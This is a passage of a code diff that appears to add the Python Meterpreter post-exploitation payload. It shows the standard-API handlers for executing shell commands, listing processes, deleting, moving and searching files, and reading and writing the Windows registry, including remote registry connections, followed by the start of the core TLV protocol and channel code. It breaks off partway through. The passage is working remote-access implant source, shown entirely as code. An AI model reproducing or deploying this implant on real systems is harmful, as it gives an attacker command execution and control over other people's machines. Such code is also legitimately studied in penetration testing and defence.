+	response += tlv_pack(TLV_TYPE_ARCHITECTURE, arch)
+	return ERROR_SUCCESS, response
+
+@meterpreter.register_function
+def stdapi_sys_process_close(request, response):
+	proc_h_id = packet_get_tlv(request, TLV_TYPE_PROCESS_HANDLE)
+	if not proc_h_id:
+		return ERROR_SUCCESS, response
+	proc_h_id = proc_h_id['value']
+	proc_h = meterpreter.channels[proc_h_id]
+	proc_h.kill()
+	return ERROR_SUCCESS, response
+
+@meterpreter.register_function
+def stdapi_sys_process_execute(request, response):
+	cmd = packet_get_tlv(request, TLV_TYPE_PROCESS_PATH)['value']
+	raw_args = packet_get_tlv(request, TLV_TYPE_PROCESS_ARGUMENTS)
+	if raw_args:
+		raw_args = raw_args['value']
+	else:
+		raw_args = ""
+	flags = packet_get_tlv(request, TLV_TYPE_PROCESS_FLAGS)['value']
+	if len(cmd) == 0:
+		return ERROR_FAILURE, response
+	if os.path.isfile('/bin/sh'):
+		args = ['/bin/sh', '-c', cmd + ' ' + raw_args]
+	else:
+		args = [cmd]
+		args.extend(shlex.split(raw_args))
+	if (flags & PROCESS_EXECUTE_FLAG_CHANNELIZED):
+		if has_pty:
+			master, slave = pty.openpty()
+			if has_termios:
+				settings = termios.tcgetattr(master)
+				settings[3] = settings[3] & ~termios.ECHO
+				termios.tcsetattr(master, termios.TCSADRAIN, settings)
+			proc_h = STDProcess(args, stdin=slave, stdout=slave, stderr=slave, bufsize=0)
+			proc_h.stdin = os.fdopen(master, 'wb')
+			proc_h.stdout = os.fdopen(master, 'rb')
+			proc_h.stderr = open(os.devnull, 'rb')
+		else:
+			proc_h = STDProcess(args, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
+		proc_h.start()
+	else:
+		proc_h = subprocess.Popen(args, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
+	proc_h_id = meterpreter.add_process(proc_h)
+	response += tlv_pack(TLV_TYPE_PID, proc_h.pid)
+	response += tlv_pack(TLV_TYPE_PROCESS_HANDLE, proc_h_id)
+	if (flags & PROCESS_EXECUTE_FLAG_CHANNELIZED):
+		channel_id = meterpreter.add_channel(proc_h)
+		response += tlv_pack(TLV_TYPE_CHANNEL_ID, channel_id)
+	return ERROR_SUCCESS, response
+
+@meterpreter.register_function
+def stdapi_sys_process_getpid(request, response):
+	response += tlv_pack(TLV_TYPE_PID, os.getpid())
+	return ERROR_SUCCESS, response
+
+def stdapi_sys_process_get_processes_via_proc(request, response):
+	for pid in os.listdir('/proc'):
+		pgroup = ''
+		if not os.path.isdir(os.path.join('/proc', pid)) or not pid.isdigit():
+			continue
+		cmd = open(os.path.join('/proc', pid, 'cmdline'), 'rb').read(512).replace('\x00', ' ')
+		status_data = open(os.path.join('/proc', pid, 'status'), 'rb').read()
+		status_data = map(lambda x: x.split('\t',1), status_data.split('\n'))
+		status_data = filter(lambda x: len(x) == 2, status_data)
+		status = {}
+		for k, v in status_data:
+			status[k[:-1]] = v.strip()
+		ppid = status.get('PPid')
+		uid = status.get('Uid').split('\t', 1)[0]
+		if has_pwd:
+			uid = pwd.getpwuid(int(uid)).pw_name
+		if cmd:
+			pname = os.path.basename(cmd.split(' ', 1)[0])
+			ppath = cmd
+		else:
+			pname = '[' + status['Name'] + ']'
+			ppath = ''
+		pgroup += tlv_pack(TLV_TYPE_PID, int(pid))
+		if ppid:
+			pgroup += tlv_pack(TLV_TYPE_PARENT_PID, int(ppid))
+		pgroup += tlv_pack(TLV_TYPE_USER_NAME, uid)
+		pgroup += tlv_pack(TLV_TYPE_PROCESS_NAME, pname)
+		pgroup += tlv_pack(TLV_TYPE_PROCESS_PATH, ppath)
+		response += tlv_pack(TLV_TYPE_PROCESS_GROUP, pgroup)
+	return ERROR_SUCCESS, response
+
+def stdapi_sys_process_get_processes_via_ps(request, response):
+	ps_args = ['ps', 'ax', '-w', '-o', 'pid,ppid,user,command']
+	proc_h = subprocess.Popen(ps_args, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
+	ps_output = proc_h.stdout.read()
+	ps_output = ps_output.split('\n')
+	ps_output.pop(0)
+	for process in ps_output:
+		process = process.split()
+		if len(process) < 4:
+			break
+		pgroup = ''
+		pgroup += tlv_pack(TLV_TYPE_PID, int(process[0]))
+		pgroup += tlv_pack(TLV_TYPE_PARENT_PID, int(process[1]))
+		pgroup += tlv_pack(TLV_TYPE_USER_NAME, process[2])
+		pgroup += tlv_pack(TLV_TYPE_PROCESS_NAME, os.path.basename(process[3]))
+		pgroup += tlv_pack(TLV_TYPE_PROCESS_PATH, ' '.join(process[3:]))
+		response += tlv_pack(TLV_TYPE_PROCESS_GROUP, pgroup)
+	return ERROR_SUCCESS, response
+
+def stdapi_sys_process_get_processes_via_windll(request, response):
+	TH32CS_SNAPPROCESS = 2
+	PROCESS_QUERY_INFORMATION = 0x0400
+	PROCESS_QUERY_LIMITED_INFORMATION = 0x1000
+	PROCESS_VM_READ = 0x10
+	TOKEN_QUERY = 0x0008
+	TokenUser = 1
+	k32 = ctypes.windll.kernel32
+	pe32 = PROCESSENTRY32()
+	pe32.dwSize = ctypes.sizeof(PROCESSENTRY32)
+	proc_snap = k32.CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0)
+	result = k32.Process32First(proc_snap, ctypes.byref(pe32))
+	if not result:
+		return ERROR_FAILURE, response
+	while result:
+		proc_h = k32.OpenProcess((PROCESS_QUERY_INFORMATION | PROCESS_VM_READ), False, pe32.th32ProcessID)
+		if not proc_h:
+			proc_h = k32.OpenProcess(PROCESS_QUERY_LIMITED_INFORMATION, False, pe32.th32ProcessID)
+		exe_path = (ctypes.c_char * 1024)()
+		success = False
+		if hasattr(ctypes.windll.psapi, 'GetModuleFileNameExA'):
+			success = ctypes.windll.psapi.GetModuleFileNameExA(proc_h, 0, exe_path, ctypes.sizeof(exe_path))
+		elif hasattr(k32, 'GetModuleFileNameExA'):
+			success = k32.GetModuleFileNameExA(proc_h, 0, exe_path, ctypes.sizeof(exe_path))
+		if not success and hasattr(k32, 'QueryFullProcessImageNameA'):
+			dw_sz = ctypes.c_uint32()
+			dw_sz.value = ctypes.sizeof(exe_path)
+			success = k32.QueryFullProcessImageNameA(proc_h, 0, exe_path, ctypes.byref(dw_sz))
+		if not success and hasattr(ctypes.windll.psapi, 'GetProcessImageFileNameA'):
+			success = ctypes.windll.psapi.GetProcessImageFileNameA(proc_h, exe_path, ctypes.sizeof(exe_path))
+		if success:
+			exe_path = ctypes.string_at(exe_path)
+		else:
+			exe_path = ''
+		complete_username = ''
+		tkn_h = ctypes.c_long()
+		tkn_len = ctypes.c_uint32()
+		if ctypes.windll.advapi32.OpenProcessToken(proc_h, TOKEN_QUERY, ctypes.byref(tkn_h)):
+			ctypes.windll.advapi32.GetTokenInformation(tkn_h, TokenUser, None, 0, ctypes.byref(tkn_len))
+			buf = (ctypes.c_ubyte * tkn_len.value)()
+			if ctypes.windll.advapi32.GetTokenInformation(tkn_h, TokenUser, ctypes.byref(buf), ctypes.sizeof(buf), ctypes.byref(tkn_len)):
+				user_tkn = SID_AND_ATTRIBUTES()
+				ctypes.memmove(ctypes.byref(user_tkn), buf, ctypes.sizeof(user_tkn))
+				username = (ctypes.c_char * 512)()
+				domain = (ctypes.c_char * 512)()
+				u_len = ctypes.c_uint32()
+				u_len.value = ctypes.sizeof(username)
+				d_len = ctypes.c_uint32()
+				d_len.value = ctypes.sizeof(domain)
+				use = ctypes.c_ulong()
+				use.value = 0
+				ctypes.windll.advapi32.LookupAccountSidA(None, user_tkn.Sid, username, ctypes.byref(u_len), domain, ctypes.byref(d_len), ctypes.byref(use))
+				complete_username = ctypes.string_at(domain) + '\\' + ctypes.string_at(username)
+			k32.CloseHandle(tkn_h)
+		parch = windll_GetNativeSystemInfo()
+		is_wow64 = ctypes.c_ubyte()
+		is_wow64.value = 0
+		if hasattr(k32, 'IsWow64Process'):
+			if k32.IsWow64Process(proc_h, ctypes.byref(is_wow64)):
+				if is_wow64.value:
+					parch = PROCESS_ARCH_X86
+		pgroup = ''
+		pgroup += tlv_pack(TLV_TYPE_PID, pe32.th32ProcessID)
+		pgroup += tlv_pack(TLV_TYPE_PARENT_PID, pe32.th32ParentProcessID)
+		pgroup += tlv_pack(TLV_TYPE_USER_NAME, complete_username)
+		pgroup += tlv_pack(TLV_TYPE_PROCESS_NAME, pe32.szExeFile)
+		pgroup += tlv_pack(TLV_TYPE_PROCESS_PATH, exe_path)
+		pgroup += tlv_pack(TLV_TYPE_PROCESS_ARCH, parch)
+		response += tlv_pack(TLV_TYPE_PROCESS_GROUP, pgroup)
+		result = k32.Process32Next(proc_snap, ctypes.byref(pe32))
+		k32.CloseHandle(proc_h)
+	k32.CloseHandle(proc_snap)
+	return ERROR_SUCCESS, response
+
+@meterpreter.register_function
+def stdapi_sys_process_get_processes(request, response):
+	if os.path.isdir('/proc'):
+		return stdapi_sys_process_get_processes_via_proc(request, response)
+	elif has_windll:
+		return stdapi_sys_process_get_processes_via_windll(request, response)
+	else:
+		return stdapi_sys_process_get_processes_via_ps(request, response)
+	return ERROR_FAILURE, response
+
+@meterpreter.register_function
+def stdapi_fs_chdir(request, response):
+	wd = packet_get_tlv(request, TLV_TYPE_DIRECTORY_PATH)['value']
+	os.chdir(wd)
+	return ERROR_SUCCESS, response
+
+@meterpreter.register_function
+def stdapi_fs_delete(request, response):
+	file_path = packet_get_tlv(request, TLV_TYPE_FILE_NAME)['value']
+	os.unlink(file_path)
+	return ERROR_SUCCESS, response
+
+@meterpreter.register_function
+def stdapi_fs_delete_dir(request, response):
+	dir_path = packet_get_tlv(request, TLV_TYPE_DIRECTORY_PATH)['value']
+	if os.path.islink(dir_path):
+		del_func = os.unlink
+	else:
+		del_func = shutil.rmtree
+	del_func(dir_path)
+	return ERROR_SUCCESS, response
+
+@meterpreter.register_function
+def stdapi_fs_delete_file(request, response):
+	file_path = packet_get_tlv(request, TLV_TYPE_FILE_PATH)['value']
+	os.unlink(file_path)
+	return ERROR_SUCCESS, response
+
+@meterpreter.register_function
+def stdapi_fs_file_expand_path(request, response):
+	path_tlv = packet_get_tlv(request, TLV_TYPE_FILE_PATH)['value']
+	if has_windll:
+		path_out = (ctypes.c_char * 4096)()
+		path_out_len = ctypes.windll.kernel32.ExpandEnvironmentStringsA(path_tlv, ctypes.byref(path_out), ctypes.sizeof(path_out))
+		result = ''.join(path_out)[:path_out_len]
+	elif path_tlv == '%COMSPEC%':
+		result = '/bin/sh'
+	elif path_tlv in ['%TEMP%', '%TMP%']:
+		result = '/tmp'
+	else:
+		result = os.getenv(path_tlv, path_tlv)
+	if not result:
+		return ERROR_FAILURE, response
+	response += tlv_pack(TLV_TYPE_FILE_PATH, result)
+	return ERROR_SUCCESS, response
+
+@meterpreter.register_function
+def stdapi_fs_file_move(request, response):
+	oldname = packet_get_tlv(request, TLV_TYPE_FILE_NAME)['value']
+	newname = packet_get_tlv(request, TLV_TYPE_FILE_PATH)['value']
+	os.rename(oldname, newname)
+	return ERROR_SUCCESS, response
+
+@meterpreter.register_function
+def stdapi_fs_getwd(request, response):
+	response += tlv_pack(TLV_TYPE_DIRECTORY_PATH, os.getcwd())
+	return ERROR_SUCCESS, response
+
+@meterpreter.register_function
+def stdapi_fs_ls(request, response):
+	path = packet_get_tlv(request, TLV_TYPE_DIRECTORY_PATH)['value']
+	path = os.path.abspath(path)
+	contents = os.listdir(path)
+	contents.sort()
+	for x in contents:
+		y = os.path.join(path, x)
+		response += tlv_pack(TLV_TYPE_FILE_NAME, x)
+		response += tlv_pack(TLV_TYPE_FILE_PATH, y)
+		response += tlv_pack(TLV_TYPE_STAT_BUF, get_stat_buffer(y))
+	return ERROR_SUCCESS, response
+
+@meterpreter.register_function
+def stdapi_fs_md5(request, response):
+	if sys.version_info[0] == 2 and sys.version_info[1] < 5:
+		import md5
+		m = md5.new()
+	else:
+		import hashlib
+		m = hashlib.md5()
+	path = packet_get_tlv(request, TLV_TYPE_FILE_PATH)['value']
+	m.update(open(path, 'rb').read())
+	response += tlv_pack(TLV_TYPE_FILE_NAME, m.digest())
+	return ERROR_SUCCESS, response
+
+@meterpreter.register_function
+def stdapi_fs_mkdir(request, response):
+	dir_path = packet_get_tlv(request, TLV_TYPE_DIRECTORY_PATH)['value']
+	os.mkdir(dir_path)
+	return ERROR_SUCCESS, response
+
+@meterpreter.register_function
+def stdapi_fs_search(request, response):
+	search_root = packet_get_tlv(request, TLV_TYPE_SEARCH_ROOT).get('value', '.')
+	search_root = ('' or '.') # sometimes it's an empty string
+	glob = packet_get_tlv(request, TLV_TYPE_SEARCH_GLOB)['value']
+	recurse = packet_get_tlv(request, TLV_TYPE_SEARCH_RECURSE)['value']
+	if recurse:
+		for root, dirs, files in os.walk(search_root):
+			for f in filter(lambda f: fnmatch.fnmatch(f, glob), files):
+				file_tlv  = ''
+				file_tlv += tlv_pack(TLV_TYPE_FILE_PATH, root)
+				file_tlv += tlv_pack(TLV_TYPE_FILE_NAME, f)
+				file_tlv += tlv_pack(TLV_TYPE_FILE_SIZE, os.stat(os.path.join(root, f)).st_size)
+				response += tlv_pack(TLV_TYPE_SEARCH_RESULTS, file_tlv)
+	else:
+		for f in filter(lambda f: fnmatch.fnmatch(f, glob), os.listdir(search_root)):
+			file_tlv  = ''
+			file_tlv += tlv_pack(TLV_TYPE_FILE_PATH, search_root)
+			file_tlv += tlv_pack(TLV_TYPE_FILE_NAME, f)
+			file_tlv += tlv_pack(TLV_TYPE_FILE_SIZE, os.stat(os.path.join(search_root, f)).st_size)
+			response += tlv_pack(TLV_TYPE_SEARCH_RESULTS, file_tlv)
+	return ERROR_SUCCESS, response
+
+@meterpreter.register_function
+def stdapi_fs_separator(request, response):
+	response += tlv_pack(TLV_TYPE_STRING, os.sep)
+	return ERROR_SUCCESS, response
+
+@meterpreter.register_function
+def stdapi_fs_sha1(request, response):
+	if sys.version_info[0] == 2 and sys.version_info[1] < 5:
+		import sha1
+		m = sha1.new()
+	else:
+		import hashlib
+		m = hashlib.sha1()
+	path = packet_get_tlv(request, TLV_TYPE_FILE_PATH)['value']
+	m.update(open(path, 'rb').read())
+	response += tlv_pack(TLV_TYPE_FILE_NAME, m.digest())
+	return ERROR_SUCCESS, response
+
+@meterpreter.register_function
+def stdapi_fs_stat(request, response):
+	path = packet_get_tlv(request, TLV_TYPE_FILE_PATH)['value']
+	st_buf = get_stat_buffer(path)
+	response += tlv_pack(TLV_TYPE_STAT_BUF, st_buf)
+	return ERROR_SUCCESS, response
+
+@meterpreter.register_function
+def stdapi_net_socket_tcp_shutdown(request, response):
+	channel_id = packet_get_tlv(request, TLV_TYPE_CHANNEL_ID)
+	channel = meterpreter.channels[channel_id]
+	channel.close()
+	return ERROR_SUCCESS, response
+
+@meterpreter.register_function_windll
+def stdapi_registry_close_key(request, response):
+	hkey = packet_get_tlv(request, TLV_TYPE_HKEY)['value']
+	result = ctypes.windll.advapi32.RegCloseKey(hkey)
+	return ERROR_SUCCESS, response
+
+@meterpreter.register_function_windll
+def stdapi_registry_create_key(request, response):
+	root_key = packet_get_tlv(request, TLV_TYPE_ROOT_KEY)['value']
+	base_key = packet_get_tlv(request, TLV_TYPE_BASE_KEY)['value']
+	permission = packet_get_tlv(request, TLV_TYPE_PERMISSION).get('value', winreg.KEY_ALL_ACCESS)
+	res_key = ctypes.c_void_p()
+	if ctypes.windll.advapi32.RegCreateKeyExA(root_key, base_key, 0, None, 0, permission, None, ctypes.byref(res_key), None) == ERROR_SUCCESS:
+		response += tlv_pack(TLV_TYPE_HKEY, res_key.value)
+		return ERROR_SUCCESS, response
+	return ERROR_FAILURE, response
+
+@meterpreter.register_function_windll
+def stdapi_registry_delete_key(request, response):
+	root_key = packet_get_tlv(request, TLV_TYPE_ROOT_KEY)['value']
+	base_key = packet_get_tlv(request, TLV_TYPE_BASE_KEY)['value']
+	flags = packet_get_tlv(request, TLV_TYPE_FLAGS)['value']
+	if (flags & DELETE_KEY_FLAG_RECURSIVE):
+		result = ctypes.windll.shlwapi.SHDeleteKeyA(root_key, base_key)
+	else:
+		result = ctypes.windll.advapi32.RegDeleteKeyA(root_key, base_key)
+	return result, response
+
+@meterpreter.register_function_windll
+def stdapi_registry_delete_value(request, response):
+	root_key = packet_get_tlv(request, TLV_TYPE_ROOT_KEY)['value']
+	value_name = packet_get_tlv(request, TLV_TYPE_VALUE_NAME)['value']
+	result = ctypes.windll.advapi32.RegDeleteValueA(root_key, value_name)
+	return result, response
+
+@meterpreter.register_function_windll
+def stdapi_registry_enum_key(request, response):
+	ERROR_MORE_DATA = 0xea
+	ERROR_NO_MORE_ITEMS = 0x0103
+	hkey = packet_get_tlv(request, TLV_TYPE_HKEY)['value']
+	name = (ctypes.c_char * 4096)()
+	index = 0
+	tries = 0
+	while True:
+		result = ctypes.windll.advapi32.RegEnumKeyA(hkey, index, name, ctypes.sizeof(name))
+		if result == ERROR_MORE_DATA:
+			if tries > 3:
+				break
+			name = (ctypes.c_char * (ctypes.sizeof(name) * 2))
+			tries += 1
+			continue
+		elif result == ERROR_NO_MORE_ITEMS:
+			result = ERROR_SUCCESS
+			break
+		elif result != ERROR_SUCCESS:
+			break
+		tries = 0
+		response += tlv_pack(TLV_TYPE_KEY_NAME, ctypes.string_at(name))
+		index += 1
+	return result, response
+
+@meterpreter.register_function_windll
+def stdapi_registry_enum_value(request, response):
+	ERROR_MORE_DATA = 0xea
+	ERROR_NO_MORE_ITEMS = 0x0103
+	hkey = packet_get_tlv(request, TLV_TYPE_HKEY)['value']
+	name = (ctypes.c_char * 4096)()
+	name_sz = ctypes.c_uint32()
+	index = 0
+	tries = 0
+	while True:
+		name_sz.value = ctypes.sizeof(name)
+		result = ctypes.windll.advapi32.RegEnumValueA(hkey, index, name, ctypes.byref(name_sz), None, None, None, None)
+		if result == ERROR_MORE_DATA:
+			if tries > 3:
+				break
+			name = (ctypes.c_char * (ctypes.sizeof(name) * 3))
+			tries += 1
+			continue
+		elif result == ERROR_NO_MORE_ITEMS:
+			result = ERROR_SUCCESS
+			break
+		elif result != ERROR_SUCCESS:
+			break
+		tries = 0
+		response += tlv_pack(TLV_TYPE_VALUE_NAME, ctypes.string_at(name))
+		index += 1
+	return result, response
+
+@meterpreter.register_function_windll
+def stdapi_registry_load_key(request, response):
+	root_key = packet_get_tlv(request, TLV_TYPE_ROOT_KEY)
+	sub_key = packet_get_tlv(request, TLV_TYPE_BASE_KEY)
+	file_name = packet_get_tlv(request, TLV_TYPE_FILE_PATH)
+	result = ctypes.windll.advapi32.RegLoadKeyA(root_key, sub_key, file_name)
+	return result, response
+
+@meterpreter.register_function_windll
+def stdapi_registry_open_key(request, response):
+	root_key = packet_get_tlv(request, TLV_TYPE_ROOT_KEY)['value']
+	base_key = packet_get_tlv(request, TLV_TYPE_BASE_KEY)['value']
+	permission = packet_get_tlv(request, TLV_TYPE_PERMISSION).get('value', winreg.KEY_ALL_ACCESS)
+	handle_id = ctypes.c_void_p()
+	if ctypes.windll.advapi32.RegOpenKeyExA(root_key, base_key, 0, permission, ctypes.byref(handle_id)) == ERROR_SUCCESS:
+		response += tlv_pack(TLV_TYPE_HKEY, handle_id.value)
+		return ERROR_SUCCESS, response
+	return ERROR_FAILURE, response
+
+@meterpreter.register_function_windll
+def stdapi_registry_open_remote_key(request, response):
+	target_host = packet_get_tlv(request, TLV_TYPE_TARGET_HOST)['value']
+	root_key = packet_get_tlv(request, TLV_TYPE_ROOT_KEY)['value']
+	result_key = ctypes.c_void_p()
+	result = ctypes.windll.advapi32.RegConnectRegistry(target_host, root_key, ctypes.byref(result_key))
+	if (result == ERROR_SUCCESS):
+		response += tlv_pack(TLV_TYPE_HKEY, result_key.value)
+		return ERROR_SUCCESS, response
+	return ERROR_FAILURE, response
+
+@meterpreter.register_function_windll
+def stdapi_registry_query_class(request, response):
+	hkey = packet_get_tlv(request, TLV_TYPE_HKEY)['value']
+	value_data = (ctypes.c_char * 4096)()
+	value_data_sz = ctypes.c_uint32()
+	value_data_sz.value = ctypes.sizeof(value_data)
+	result = ctypes.windll.advapi32.RegQueryInfoKeyA(hkey, value_data, ctypes.byref(value_data_sz), None, None, None, None, None, None, None, None, None)
+	if result == ERROR_SUCCESS:
+		response += tlv_pack(TLV_TYPE_VALUE_DATA, ctypes.string_at(value_data))
+		return ERROR_SUCCESS, response
+	return ERROR_FAILURE, response
+
+@meterpreter.register_function_windll
+def stdapi_registry_query_value(request, response):
+	REG_SZ = 1
+	REG_DWORD = 4
+	hkey = packet_get_tlv(request, TLV_TYPE_HKEY)['value']
+	value_name = packet_get_tlv(request, TLV_TYPE_VALUE_NAME)['value']
+	value_type = ctypes.c_uint32()
+	value_type.value = 0
+	value_data = (ctypes.c_ubyte * 4096)()
+	value_data_sz = ctypes.c_uint32()
+	value_data_sz.value = ctypes.sizeof(value_data)
+	result = ctypes.windll.advapi32.RegQueryValueExA(hkey, value_name, 0, ctypes.byref(value_type), value_data, ctypes.byref(value_data_sz))
+	if result == ERROR_SUCCESS:
+		response += tlv_pack(TLV_TYPE_VALUE_TYPE, value_type.value)
+		if value_type.value == REG_SZ:
+			response += tlv_pack(TLV_TYPE_VALUE_DATA, ctypes.string_at(value_data) + '\x00')
+		elif value_type.value == REG_DWORD:
+			response += tlv_pack(TLV_TYPE_VALUE_DATA, ''.join(value_data.value)[:4])
+		else:
+			response += tlv_pack(TLV_TYPE_VALUE_DATA, ''.join(value_data.value)[:value_data_sz.value])
+		return ERROR_SUCCESS, response
+	return ERROR_FAILURE, response
+
+@meterpreter.register_function_windll
+def stdapi_registry_set_value(request, response):
+	hkey = packet_get_tlv(request, TLV_TYPE_HKEY)['value']
+	value_name = packet_get_tlv(request, TLV_TYPE_VALUE_NAME)['value']
+	value_type = packet_get_tlv(request, TLV_TYPE_VALUE_TYPE)['value']
+	value_data = packet_get_tlv(request, TLV_TYPE_VALUE_DATA)['value']
+	result = ctypes.windll.advapi32.RegSetValueExA(hkey, value_name, 0, value_type, value_data, len(value_data))
+	return result, response
+
+@meterpreter.register_function_windll
+def stdapi_registry_unload_key(request, response):
+	root_key = packet_get_tlv(request, TLV_TYPE_ROOT_KEY)['value']
+	base_key = packet_get_tlv(request, TLV_TYPE_BASE_KEY)['value']
+	result = ctypes.windll.advapi32.RegUnLoadKeyA(root_key, base_key)
+	return result, response

data/meterpreter/meterpreter.py

@@ -0,0 +1,415 @@
+#!/usr/bin/python
+import code
+import ctypes
+import os
+import random
+import select
+import socket
+import struct
+import subprocess
+import sys
+import threading
+
+has_windll = hasattr(ctypes, 'windll')
+
+#
+# Constants
+#
+PACKET_TYPE_REQUEST = 0
+PACKET_TYPE_RESPONSE = 1
+PACKET_TYPE_PLAIN_REQUEST = 10
+PACKET_TYPE_PLAIN_RESPONSE = 11
+
+ERROR_SUCCESS = 0
+# not defined in original C implementation
+ERROR_FAILURE = 1
+
+CHANNEL_CLASS_BUFFERED = 0
+CHANNEL_CLASS_STREAM = 1
+CHANNEL_CLASS_DATAGRAM = 2
+CHANNEL_CLASS_POOL = 3
+
+#
+# TLV Meta Types
+#
+TLV_META_TYPE_NONE =       (   0   )
+TLV_META_TYPE_STRING =     (1 << 16)
+TLV_META_TYPE_UINT =       (1 << 17)
+TLV_META_TYPE_RAW =        (1 << 18)
+TLV_META_TYPE_BOOL =       (1 << 19)
+TLV_META_TYPE_COMPRESSED = (1 << 29)
+TLV_META_TYPE_GROUP =      (1 << 30)
+TLV_META_TYPE_COMPLEX =    (1 << 31)
+# not defined in original
+TLV_META_TYPE_MASK =    (1<<31)+(1<<30)+(1<<29)+(1<<19)+(1<<18)+(1<<17)+(1<<16)
+
+#
+# TLV base starting points
+#
+TLV_RESERVED =   0
+TLV_EXTENSIONS = 20000
+TLV_USER =       40000
+TLV_TEMP =       60000
+
+#
+# TLV Specific Types
+#
+TLV_TYPE_ANY =                 TLV_META_TYPE_NONE   |   0
+TLV_TYPE_METHOD =              TLV_META_TYPE_STRING |   1
+TLV_TYPE_REQUEST_ID =          TLV_META_TYPE_STRING |   2
+TLV_TYPE_EXCEPTION =           TLV_META_TYPE_GROUP  |   3
+TLV_TYPE_RESULT =              TLV_META_TYPE_UINT   |   4
+
+TLV_TYPE_STRING =              TLV_META_TYPE_STRING |  10
+TLV_TYPE_UINT =                TLV_META_TYPE_UINT   |  11
+TLV_TYPE_BOOL =                TLV_META_TYPE_BOOL   |  12
+
+TLV_TYPE_LENGTH =              TLV_META_TYPE_UINT   |  25
+TLV_TYPE_DATA =                TLV_META_TYPE_RAW    |  26
+TLV_TYPE_FLAGS =               TLV_META_TYPE_UINT   |  27
+
+TLV_TYPE_CHANNEL_ID =          TLV_META_TYPE_UINT   |  50
+TLV_TYPE_CHANNEL_TYPE =        TLV_META_TYPE_STRING |  51
+TLV_TYPE_CHANNEL_DATA =        TLV_META_TYPE_RAW    |  52
+TLV_TYPE_CHANNEL_DATA_GROUP =  TLV_META_TYPE_GROUP  |  53
+TLV_TYPE_CHANNEL_CLASS =       TLV_META_TYPE_UINT   |  54
+
+TLV_TYPE_SEEK_WHENCE =         TLV_META_TYPE_UINT   |  70
+TLV_TYPE_SEEK_OFFSET =         TLV_META_TYPE_UINT   |  71
+TLV_TYPE_SEEK_POS =            TLV_META_TYPE_UINT   |  72
+
+TLV_TYPE_EXCEPTION_CODE =      TLV_META_TYPE_UINT   | 300
+TLV_TYPE_EXCEPTION_STRING =    TLV_META_TYPE_STRING | 301
+
+TLV_TYPE_LIBRARY_PATH =        TLV_META_TYPE_STRING | 400
+TLV_TYPE_TARGET_PATH =         TLV_META_TYPE_STRING | 401
+TLV_TYPE_MIGRATE_PID =         TLV_META_TYPE_UINT   | 402
+TLV_TYPE_MIGRATE_LEN =         TLV_META_TYPE_UINT   | 403
+
+TLV_TYPE_CIPHER_NAME =         TLV_META_TYPE_STRING | 500
+TLV_TYPE_CIPHER_PARAMETERS =   TLV_META_TYPE_GROUP  | 501
+
+def generate_request_id():
+	chars = 'abcdefghijklmnopqrstuvwxyz'
+	return ''.join(random.choice(chars) for x in xrange(32))
+
+def packet_get_tlv(pkt, tlv_type):
+	offset = 0
+	while (offset < len(pkt)):
+		tlv = struct.unpack('>II', pkt[offset:offset+8])
+		if (tlv[1] & ~TLV_META_TYPE_COMPRESSED) == tlv_type:
+			val = pkt[offset+8:(offset+8+(tlv[0] - 8))]
+			if (tlv[1] & TLV_META_TYPE_STRING) == TLV_META_TYPE_STRING:
+				val = val.split('\x00', 1)[0]
+			elif (tlv[1] & TLV_META_TYPE_UINT) == TLV_META_TYPE_UINT:
+				val = struct.unpack('>I', val)[0]
+			elif (tlv[1] & TLV_META_TYPE_BOOL) == TLV_META_TYPE_BOOL:
+				val = bool(struct.unpack('b', val)[0])
+			elif (tlv[1] & TLV_META_TYPE_RAW) == TLV_META_TYPE_RAW:
+				pass
+			return {'type':tlv[1], 'length':tlv[0], 'value':val}
+		offset += tlv[0]
+	return {}
+
+def tlv_pack(*args):
+	if len(args) == 2:
+		tlv = {'type':args[0], 'value':args[1]}
+	else:
+		tlv = args[0]
+	data = ""
+	if (tlv['type'] & TLV_META_TYPE_STRING) == TLV_META_TYPE_STRING:
+		data = struct.pack('>II', 8 + len(tlv['value']) + 1, tlv['type']) + tlv['value'] + '\x00'
+	elif (tlv['type'] & TLV_META_TYPE_UINT) == TLV_META_TYPE_UINT:
+		data = struct.pack('>III', 12, tlv['type'], tlv['value'])
+	elif (tlv['type'] & TLV_META_TYPE_BOOL) == TLV_META_TYPE_BOOL:
+		data = struct.pack('>II', 9, tlv['type']) + chr(int(bool(tlv['value'])))
+	elif (tlv['type'] & TLV_META_TYPE_RAW) == TLV_META_TYPE_RAW:
+		data = struct.pack('>II', 8 + len(tlv['value']), tlv['type']) + tlv['value']
+	elif (tlv['type'] & TLV_META_TYPE_GROUP) == TLV_META_TYPE_GROUP:
+		data = struct.pack('>II', 8 + len(tlv['value']), tlv['type']) + tlv['value']
+	elif (tlv['type'] & TLV_META_TYPE_COMPLEX) == TLV_META_TYPE_COMPLEX:
+		data = struct.pack('>II', 8 + len(tlv['value']), tlv['type']) + tlv['value']
+	return data
+
+class STDProcessBuffer(threading.Thread):
+	def __init__(self, std, is_alive):
+		threading.Thread.__init__(self)
+		self.std = std
+		self.is_alive = is_alive
+		self.data = ''
+		self.data_lock = threading.RLock()
+
+	def run(self):
+		while self.is_alive():
+			byte = self.std.read(1)
+			self.data_lock.acquire()
+			self.data += byte
+			self.data_lock.release()
+		data = self.std.read()
+		self.data_lock.acquire()
+		self.data += data
+		self.data_lock.release()
+
+	def is_read_ready(self):
+		return len(self.data) != 0
+
+	def read(self, l = None):
+		data = ''
+		self.data_lock.acquire()
+		if l == None:
+			data = self.data
+			self.data = ''
+		else:
+			data = self.data[0:l]
+			self.data = self.data[l:]
+		self.data_lock.release()
+		return data
+
+class STDProcess(subprocess.Popen):
+	def __init__(self, *args, **kwargs):
+		subprocess.Popen.__init__(self, *args, **kwargs)
+
+	def start(self):
+		self.stdout_reader = STDProcessBuffer(self.stdout, lambda: self.poll() == None)
+		self.stdout_reader.start()
+		self.stderr_reader = STDProcessBuffer(self.stderr, lambda: self.poll() == None)
+		self.stderr_reader.start()
+
+class PythonMeterpreter(object):
+	def __init__(self, socket):
+		self.socket = socket
+		self.extension_functions = {}
+		self.channels = {}
+		self.interact_channels = []
+		self.processes = {}
+		for func in filter(lambda x: x.startswith('_core'), dir(self)):
+			self.extension_functions[func[1:]] = getattr(self, func)
+		self.running = True
+
+	def register_function(self, func):
+		self.extension_functions[func.__name__] = func
+
+	def register_function_windll(self, func):
+		if has_windll:
+			self.register_function(func)
+
+	def add_channel(self, channel):
+		idx = 0
